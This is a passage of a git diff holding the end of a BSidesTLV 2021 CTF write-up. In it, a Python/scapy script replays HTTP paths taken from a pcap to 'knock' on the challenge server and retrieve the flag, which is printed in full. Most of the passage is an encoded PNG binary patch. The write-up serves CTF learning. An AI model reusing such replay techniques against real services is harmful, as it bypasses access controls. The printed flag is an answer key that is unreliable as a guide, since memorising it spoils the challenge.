    • +``` + +So, we'll visit `/flag` once we're done knocking. + +```python +import requests +from scapy.all import * +from scapy.layers.http import HTTPRequest + +HOST = "w3reisthed0or.ctf.bsidestlv.com" +BASE_URI = "http://" + HOST + +s = requests.session() + +def request_uri(uri): + print(f"Calling {uri}") + r = s.get(uri) + return r.text + +def filter_packets(packet): + if not packet.haslayer('HTTPRequest'): + return + if not packet[IP].src == "10.0.3.15": + return + if not packet[IP].dst == "3.126.235.224": + return + if not packet[HTTPRequest].Host.decode("utf-8") == HOST: + return + + path = packet[HTTPRequest].Path.decode("utf-8") + + request_uri(BASE_URI + path) + +sniff(offline = 'w3reisthed0or.pcap', + session = TCPSession, + prn = filter_packets) + +print(request_uri(f"{BASE_URI}/flag")) +``` + +Output: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ python3 knock.py +Calling http://w3reisthed0or.ctf.bsidestlv.com/ +Calling http://w3reisthed0or.ctf.bsidestlv.com/favicon.ico +Calling http://w3reisthed0or.ctf.bsidestlv.com/CaN +Calling http://w3reisthed0or.ctf.bsidestlv.com/yoU +Calling http://w3reisthed0or.ctf.bsidestlv.com/D0 +Calling http://w3reisthed0or.ctf.bsidestlv.com/tA9 +Calling http://w3reisthed0or.ctf.bsidestlv.com/dAnC3 +Calling http://w3reisthed0or.ctf.bsidestlv.com/4 +Calling http://w3reisthed0or.ctf.bsidestlv.com/M3 +Calling http://w3reisthed0or.ctf.bsidestlv.com/ +Calling http://w3reisthed0or.ctf.bsidestlv.com/flag + + + + + + + + + BSidesTLV 2021 - Flag + + + + + + + + + + +
    +
    +

    The Flag Is

    +

    BSidesTLV2021{g0oD.4.Y0u.U.Kno0k3d.1T}

    +
    +
    + + + +``` + +The flag: `BSidesTLV2021{g0oD.4.Y0u.U.Kno0k3d.1T}` \ No newline at end of file diff --git a/2021_BSidesTLV/images/top3.png b/2021_BSidesTLV/images/top3.png new file mode 100644 index 0000000000000000000000000000000000000000..02a0cb966dae3da77f18038341e92e94383923a9 GIT binary patch literal 57798 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 